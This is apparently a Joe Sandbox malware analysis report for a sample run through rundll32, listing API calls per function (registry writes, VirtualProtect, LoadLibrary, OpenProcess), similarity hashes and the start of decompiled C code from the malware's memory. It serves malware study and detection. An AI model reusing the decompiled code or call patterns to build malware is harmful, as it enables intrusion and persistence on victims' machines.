                                • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 034726E7
                                • memcpy.NTDLL(00000000,?,?,?), ref: 03472710
                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 03472739
                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,00000000), ref: 03472759
                                • RegCloseKey.ADVAPI32(?), ref: 03472764
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Value$AllocateCloseCreateHeapmemcpy
                                • String ID:
                                • API String ID: 2954810647-0
                                • Opcode ID: 1e6da939070842c2777164a0892e40e3655825bb445ebe008d89ba89762d31c5
                                • Instruction ID: 510d79bb1b7868ef856abf80b39a3dad44aa14b15754146f1a45ac0ab43decc6
                                • Opcode Fuzzy Hash: 1e6da939070842c2777164a0892e40e3655825bb445ebe008d89ba89762d31c5
                                • Instruction Fuzzy Hash: 02114F76100209AFDF11AE65AD84EEB76BDEB54251F04442BFD01BA290D6718920D7A5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347E57D Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(0347980C,?,?,?,?,00000008,0347980C,00000000,?), ref: 0347E59A
                                • memcpy.NTDLL(0347980C,?,00000009,?,?,?,?,00000008,0347980C,00000000,?), ref: 0347E5BC
                                • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 0347E5D4
                                • lstrlenW.KERNEL32(00000000,00000001,0347980C,?,?,?,?,?,?,?,00000008,0347980C,00000000,?), ref: 0347E5F4
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00000008,0347980C,00000000,?), ref: 0347E619
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                                • String ID:
                                • API String ID: 3065863707-0
                                • Opcode ID: ea3fac1977d54d94a7dfcd85b699a9163c17628ffc590f1e51653eeb5d84bb9d
                                • Instruction ID: c01560ff33907f805fd64c241a39596b437b2a5b8abe524dbe44a44ab18f4aba
                                • Opcode Fuzzy Hash: ea3fac1977d54d94a7dfcd85b699a9163c17628ffc590f1e51653eeb5d84bb9d
                                • Instruction Fuzzy Hash: C6116379D00208BFCB21EFA5D809FCE7BF8AB19350F004056FA09EE285E6749648CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348FE94 Relevance: 7.6, APIs: 5, Instructions: 61stringtimeCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcmpi.KERNEL32(00000000,?), ref: 0348FEC3
                                • RtlEnterCriticalSection.NTDLL(0349A428), ref: 0348FED0
                                • RtlLeaveCriticalSection.NTDLL(0349A428), ref: 0348FEE3
                                • lstrcmpi.KERNEL32(0349A440,00000000), ref: 0348FF03
                                • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0347404D,00000000), ref: 0348FF17
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                                • String ID:
                                • API String ID: 1266740956-0
                                • Opcode ID: fee6b438fa14b9ee434106141204991e8f207f072d59a1eafdcfddf4b259ee8d
                                • Instruction ID: 8b03ba42896dab071b82945d54b2cb4a8c2775cc7a6e0113bf591268da50d3e5
                                • Opcode Fuzzy Hash: fee6b438fa14b9ee434106141204991e8f207f072d59a1eafdcfddf4b259ee8d
                                • Instruction Fuzzy Hash: 2F118132900205EFDB05EB58D849A5EFBE8FF59328F15405BE905EB240D7349D05CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03473263 Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000000,03493716,00000000,03482466,?,?,?,03488A07,?,?,?,00000000,00000001,00000000,?), ref: 0347326D
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • lstrcpy.KERNEL32(00000000,?), ref: 03473291
                                • StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,03488A07,?,?,?,00000000,00000001,00000000,?,00000000), ref: 03473298
                                • lstrcpy.KERNEL32(00000000,?), ref: 034732E0
                                • lstrcat.KERNEL32(00000000,?), ref: 034732EF
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                                • String ID:
                                • API String ID: 2616531654-0
                                • Opcode ID: b6c0314506ca3432718aa6959f458b648ccd42dc5e5fb0d1c1f18b0eba95f5d0
                                • Instruction ID: 9fe63c7c5ebc0e2e3fea033433706319ec87a8f6e5e51e62f8b2bc543b5f2c99
                                • Opcode Fuzzy Hash: b6c0314506ca3432718aa6959f458b648ccd42dc5e5fb0d1c1f18b0eba95f5d0
                                • Instruction Fuzzy Hash: 9D11A37A2002069BD721EF699C89EABB7ECEB95200F19012AF505EB244EB24D50597A5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348E3CD Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0348D580: lstrlen.KERNEL32(00000000,00000000,?,00000000,0347243E,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 0348D58C
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0348E3F6
                                • memcpy.NTDLL(00000000,?,?), ref: 0348E409
                                • RtlEnterCriticalSection.NTDLL(0349A428), ref: 0348E41A
                                • RtlLeaveCriticalSection.NTDLL(0349A428), ref: 0348E42F
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0348E467
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                                • String ID:
                                • API String ID: 2349942465-0
                                • Opcode ID: b474b98bd83727fef4860030f9e075f31e74214256f5b17fad02fa385db8a202
                                • Instruction ID: 9abe0570ac02b8edd4fc24c3a4d3d63237b187939c157414c3e1766ac2d4e632
                                • Opcode Fuzzy Hash: b474b98bd83727fef4860030f9e075f31e74214256f5b17fad02fa385db8a202
                                • Instruction Fuzzy Hash: 5C11CE76101210EFD711BF28EC48C6FBBE8EB8A229716456FFD09AF214D6315C458AA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03484D17 Relevance: 7.6, APIs: 5, Instructions: 57memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(0347C1F8,00000000,00000000,00000000,?,03480FD9,?,0347C1F8,00000000), ref: 03484D2D
                                • lstrlen.KERNEL32(?,?,03480FD9,?,0347C1F8,00000000), ref: 03484D34
                                • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 03484D42
                                  • Part of subcall function 0347EEF2: GetLocalTime.KERNEL32(?,?,?,?,0348FC9E,00000000,00000001), ref: 0347EEFC
                                  • Part of subcall function 0347EEF2: wsprintfA.USER32 ref: 0347EF2F
                                • wsprintfA.USER32 ref: 03484D64
                                  • Part of subcall function 0347ED48: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,03484D8C,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 0347ED66
                                  • Part of subcall function 0347ED48: wsprintfA.USER32 ref: 0347ED8B
                                • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 03484D95
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                                • String ID:
                                • API String ID: 3847261958-0
                                • Opcode ID: 5001fd9d18a821a30ddfec542931a0eb95b284152af9512849c0c8eccaf71e72
                                • Instruction ID: 421e3a1561b738d4034952986221e04e3463bb5064d135779aafcc209fd22f63
                                • Opcode Fuzzy Hash: 5001fd9d18a821a30ddfec542931a0eb95b284152af9512849c0c8eccaf71e72
                                • Instruction Fuzzy Hash: DD01A135100218BFDB127F26EC44DAF7FA9EF95360B158023FD08AE215D6329955DBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348DCF6 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                Download Yara Rule
                                APIs
                                • ResetEvent.KERNEL32(?,00000008,00000000,0000EA60,00000000,00000000,00000000,?,0347DBAC,?,?,00000000,03473EC6,?,00000000), ref: 0348DD35
                                • ResetEvent.KERNEL32(?,?,0347DBAC,?,?,00000000,03473EC6,?,00000000), ref: 0348DD3A
                                • GetLastError.KERNEL32(0347DBAC,?,?,00000000,03473EC6,?,00000000), ref: 0348DD55
                                • GetLastError.KERNEL32(0000EA60,00000000,00000000,00000000,?,0347DBAC,?,?,00000000,03473EC6,?,00000000), ref: 0348DD84
                                  • Part of subcall function 0347D429: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0348DD0F,00000000,00000000,00000004,00000000,?,0347DBAC,?,?,00000000), ref: 0347D435
                                  • Part of subcall function 0347D429: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0348DD0F,00000000,00000000,00000004,00000000,?,0347DBAC,?), ref: 0347D493
                                  • Part of subcall function 0347D429: lstrcpy.KERNEL32(00000000,00000000), ref: 0347D4A3
                                • SetEvent.KERNEL32(?,0347DBAC,?,?,00000000,03473EC6,?,00000000), ref: 0348DD76
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                • String ID:
                                • API String ID: 1449191863-0
                                • Opcode ID: 18e28eba467165ca47b1165072ff888136495f29956f10e579e69d032e21a353
                                • Instruction ID: d17f4ba18b907f29a58e53a63016a42921db03cb95d119542618fe17a3a01bed
                                • Opcode Fuzzy Hash: 18e28eba467165ca47b1165072ff888136495f29956f10e579e69d032e21a353
                                • Instruction Fuzzy Hash: E311CA31000609EFDF22BF61DC44A9F7BE8EF0A368F244666F911991E0C331E852DBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03490A9D Relevance: 7.6, APIs: 5, Instructions: 55memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00004000,-00000008), ref: 03490AB4
                                  • Part of subcall function 0348EC09: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0348EC20
                                  • Part of subcall function 0348EC09: SetEvent.KERNEL32(?,?,?,?,03473EC6,?,?), ref: 0348EC30
                                • lstrlen.KERNEL32(?,?,?,?,?,0347859B,?,?), ref: 03490AD7
                                • lstrlen.KERNEL32(?,?,?,?,0347859B,?,?), ref: 03490AE1
                                • memcpy.NTDLL(?,?,00004000,?,?,0347859B,?,?), ref: 03490AF2
                                • HeapFree.KERNEL32(00000000,?,?,?,?,0347859B,?,?), ref: 03490B14
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heaplstrlen$AllocateEventFreeObjectSingleWaitmemcpy
                                • String ID:
                                • API String ID: 442095154-0
                                • Opcode ID: 5052e380472d333418d8d4c5edb1c329ba481bde9868d04eb9a37191c6adc3a6
                                • Instruction ID: 2b668ef7cbe6966014dde04a8b505ca86529f4fdbe75ef60f696ff595195b9c8
                                • Opcode Fuzzy Hash: 5052e380472d333418d8d4c5edb1c329ba481bde9868d04eb9a37191c6adc3a6
                                • Instruction Fuzzy Hash: 7A118E75900204EFDF11EF95EC44E5EBFF9EB96364F21406BE905AB210E6319D04DB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03487A3E Relevance: 7.5, APIs: 5, Instructions: 49memorystringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0347AE7C: lstrlen.KERNEL32(0347E448,00000000,00000000,?,?,03487A5B,?,?,?,?,0347E448,?), ref: 0347AE8B
                                  • Part of subcall function 0347AE7C: mbstowcs.NTDLL ref: 0347AEA7
                                • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0347E448,?), ref: 03487A6A
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03487A7C
                                • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0347E448,?), ref: 03487A99
                                • lstrlenW.KERNEL32(00000000,?,?,0347E448,?), ref: 03487AA5
                                • HeapFree.KERNEL32(00000000,00000000,?,?,0347E448,?), ref: 03487AB9
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                                • String ID:
                                • API String ID: 3403466626-0
                                • Opcode ID: eca6e1b9aa99c582ac9b5ef2638a003bfaa5f4c69a1c44333fc301d5dd620dd0
                                • Instruction ID: 1d3a8db82933b48cc945a9601c29b655377f3de01db9ffc22c217a58b51dbc72
                                • Opcode Fuzzy Hash: eca6e1b9aa99c582ac9b5ef2638a003bfaa5f4c69a1c44333fc301d5dd620dd0
                                • Instruction Fuzzy Hash: F8018C72101204BFC712EF99EC85FAE7BECEF5A310F150056FA05AF214C77499048BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347F49F Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32 ref: 0347F4BF
                                • GetModuleHandleA.KERNEL32 ref: 0347F4CD
                                • LoadLibraryExW.KERNEL32(?,?,?), ref: 0347F4DA
                                • GetModuleHandleA.KERNEL32 ref: 0347F4F1
                                • GetModuleHandleA.KERNEL32 ref: 0347F4FD
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HandleModule$LibraryLoad
                                • String ID:
                                • API String ID: 1178273743-0
                                • Opcode ID: 1fe36466f5e92031cc9649fcba45c18bdc8a2e7c3e12ca9219a8ded647cef19a
                                • Instruction ID: 5f69d0f6b732834b9285aff31f07116fda880765749c839ef69a94624b26fd18
                                • Opcode Fuzzy Hash: 1fe36466f5e92031cc9649fcba45c18bdc8a2e7c3e12ca9219a8ded647cef19a
                                • Instruction Fuzzy Hash: 04016231600306ABDF41AF69EC459ABBBE9FF542A1708007BED14DA224DB71C8159B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03491659 Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON
                                Download Yara Rule
                                APIs
                                • RtlEnterCriticalSection.NTDLL(0349A400), ref: 03491664
                                • RtlLeaveCriticalSection.NTDLL(0349A400), ref: 03491675
                                • VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,03484B8B,?,?,0349A428,034725BA,00000003), ref: 0349168C
                                • VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,03484B8B,?,?,0349A428,034725BA,00000003), ref: 034916A6
                                • GetLastError.KERNEL32(?,?,03484B8B,?,?,0349A428,034725BA,00000003), ref: 034916B3
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                • String ID:
                                • API String ID: 653387826-0
                                • Opcode ID: b04b10605b3a57bb08308a3192a2fe5656825ada64ce8f1cd0df1a296a5f3eba
                                • Instruction ID: d90f07587a378d9cfb693517dd35f16ed6c4164af42fb3a9dc716585aa386a7d
                                • Opcode Fuzzy Hash: b04b10605b3a57bb08308a3192a2fe5656825ada64ce8f1cd0df1a296a5f3eba
                                • Instruction Fuzzy Hash: 1501DF75600304EFD721EF25CC04D2ABBF8EF85220B21816AEA029B350C770ED028FA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348BDC6 Relevance: 7.5, APIs: 5, Instructions: 42stringCOMMON
                                Download Yara Rule
                                APIs
                                • StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,0347396C), ref: 0348BDCC
                                • StrTrimA.SHLWAPI(00000001,?,?,0347396C), ref: 0348BDEF
                                • StrTrimA.SHLWAPI(00000000,?,?,0347396C), ref: 0348BDFE
                                • _strupr.NTDLL ref: 0348BE01
                                • lstrlen.KERNEL32(00000000,0347396C), ref: 0348BE09
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Trim$_struprlstrlen
                                • String ID:
                                • API String ID: 2280331511-0
                                • Opcode ID: 7f8db76737d1675a9fe65160b0545b0e568ff1c07d1bbee0dd4359277bb689c6
                                • Instruction ID: 70111f0fbf0a8701628f472abf09b24ddc6eede4046b26f53c9d7f395b5f3299
                                • Opcode Fuzzy Hash: 7f8db76737d1675a9fe65160b0545b0e568ff1c07d1bbee0dd4359277bb689c6
                                • Instruction Fuzzy Hash: 0CF06771201111AFEB06FB29EC89E3F37ECEB5A659B14015BF909EF244DB259C0287A5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03480818 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,03482397,?), ref: 03480820
                                • GetVersion.KERNEL32 ref: 0348082F
                                • GetCurrentProcessId.KERNEL32 ref: 0348084B
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 03480868
                                • GetLastError.KERNEL32 ref: 03480887
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                • String ID:
                                • API String ID: 2270775618-0
                                • Opcode ID: 7cb99d60ada7e30c24f488f58462c2cf5abd51520445e118c69782d1397b7135
                                • Instruction ID: 9d75b539421faa9e86659e2ed89ad688efd45389645100a55ba465703a549c13
                                • Opcode Fuzzy Hash: 7cb99d60ada7e30c24f488f58462c2cf5abd51520445e118c69782d1397b7135
                                • Instruction Fuzzy Hash: 85F06870650301BBD725FF64A81BB1A3BE1E755741F240957E64AED2DCD7708085CB9C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034789EE Relevance: 7.5, APIs: 5, Instructions: 35synchronizationthreadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 034789FB
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 03478A0B
                                • CloseHandle.KERNEL32(00000000,?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 03478A14
                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,03482F34,?,?,00000040,?,?,?,?,?,?,00000000), ref: 03478A32
                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,03482F34,?,?,00000040,?,?,?,?,?,?,00000000), ref: 03478A3F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                                • String ID:
                                • API String ID: 3667519916-0
                                • Opcode ID: e624a82c7e37b3a1d9c12c1150bc7ed4d15ae78be33decc5a7fad779d9f93ea5
                                • Instruction ID: b12c2ac11363d9036d2d2f1fa5d001c83754f8ceb715b49b4f8b6b5c8d22b587
                                • Opcode Fuzzy Hash: e624a82c7e37b3a1d9c12c1150bc7ed4d15ae78be33decc5a7fad779d9f93ea5
                                • Instruction Fuzzy Hash: E9F09030200700AFDB21BB35DC49B1BB3F8EF55611F24062AF041AA590CB30E841CA68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348C484 Relevance: 6.3, APIs: 5, Instructions: 78memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000000,00000000,?,?,?,?,?), ref: 0348C4A8
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • wsprintfA.USER32 ref: 0348C4D9
                                  • Part of subcall function 0347AAAF: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,0347A1A1), ref: 0347AAC5
                                  • Part of subcall function 0347AAAF: wsprintfA.USER32 ref: 0347AAED
                                  • Part of subcall function 0347AAAF: lstrlen.KERNEL32(?), ref: 0347AAFC
                                  • Part of subcall function 0347AAAF: wsprintfA.USER32 ref: 0347AB3C
                                  • Part of subcall function 0347AAAF: wsprintfA.USER32 ref: 0347AB71
                                  • Part of subcall function 0347AAAF: memcpy.NTDLL(00000000,?,?), ref: 0347AB7E
                                  • Part of subcall function 0347AAAF: memcpy.NTDLL(00000008,034953E8,00000002,00000000,?,?), ref: 0347AB93
                                  • Part of subcall function 0347AAAF: wsprintfA.USER32 ref: 0347ABB6
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0348C54E
                                  • Part of subcall function 03492968: RtlEnterCriticalSection.NTDLL(0616C2D0), ref: 0349297E
                                  • Part of subcall function 03492968: RtlLeaveCriticalSection.NTDLL(0616C2D0), ref: 03492999
                                • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 0348C538
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0348C544
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                                • String ID:
                                • API String ID: 3553201432-0
                                • Opcode ID: 7027e53e3f89b9691e599fcac3a4a1db30bbb6cc1aa740ba87c08db9cea4e4c3
                                • Instruction ID: 086b07d06696b53141f6d3d9df9e3e5e5b427fcdd31592c90270692e304c216e
                                • Opcode Fuzzy Hash: 7027e53e3f89b9691e599fcac3a4a1db30bbb6cc1aa740ba87c08db9cea4e4c3
                                • Instruction Fuzzy Hash: 68210776900259AFCF11EFA9DC89CDF7FB9FB89310B04441BF915AA210D7719A24DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347EF5F Relevance: 6.3, APIs: 5, Instructions: 76memoryCOMMON
                                Download Yara Rule
                                APIs
                                • HeapFree.KERNEL32(00000000,?), ref: 0347EFBC
                                • HeapFree.KERNEL32(00000000,?), ref: 0347EFCD
                                • HeapFree.KERNEL32(00000000,?), ref: 0347EFE5
                                • CloseHandle.KERNEL32(?), ref: 0347EFFF
                                • HeapFree.KERNEL32(00000000,?), ref: 0347F014
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FreeHeap$CloseHandle
                                • String ID:
                                • API String ID: 1910495013-0
                                • Opcode ID: b5493f6ecae0d7588c59bb0db69973937c2d1c619253c42d97297fcff4d25be4
                                • Instruction ID: eeb03d27ee50afe6becddaa1ffaad6810ee8e6bbf5528ea3d65717405dc92151
                                • Opcode Fuzzy Hash: b5493f6ecae0d7588c59bb0db69973937c2d1c619253c42d97297fcff4d25be4
                                • Instruction Fuzzy Hash: AB213A31201521BFC222EF66DC88C5AFBAAFF49B503590556F408DBA54C731ECA6DA94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034896EE Relevance: 6.2, APIs: 4, Instructions: 192COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0347EC00: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0347EC1B
                                  • Part of subcall function 0347EC00: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0347EC69
                                  • Part of subcall function 0347EC00: GetProcAddress.KERNEL32(00000000,?), ref: 0347EC82
                                  • Part of subcall function 0347EC00: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 0347ECD3
                                • GetLastError.KERNEL32(?,?,00000001), ref: 0348987C
                                • FreeLibrary.KERNEL32(?,?,00000001), ref: 034898E4
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                                • String ID:
                                • API String ID: 1730969706-0
                                • Opcode ID: 17bf9d4cb8c04316e61556cb84b0512a8035c3ec5d080b3708080d16306eeada
                                • Instruction ID: f1e31dedc97fa41f0f8a0f7baa2e55e83574cf37405775eb359b7f4393da7741
                                • Opcode Fuzzy Hash: 17bf9d4cb8c04316e61556cb84b0512a8035c3ec5d080b3708080d16306eeada
                                • Instruction Fuzzy Hash: 6E71FB75D0060AEFCF10EFE5C8849AEBBB9FF48304B1449AAE516AB350D731A945CF64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03432732 Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 46%
                                			E03432732(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x343a348; // 0x21ad5a8
					_t5 = _t103 + 0x343b038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x3439290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
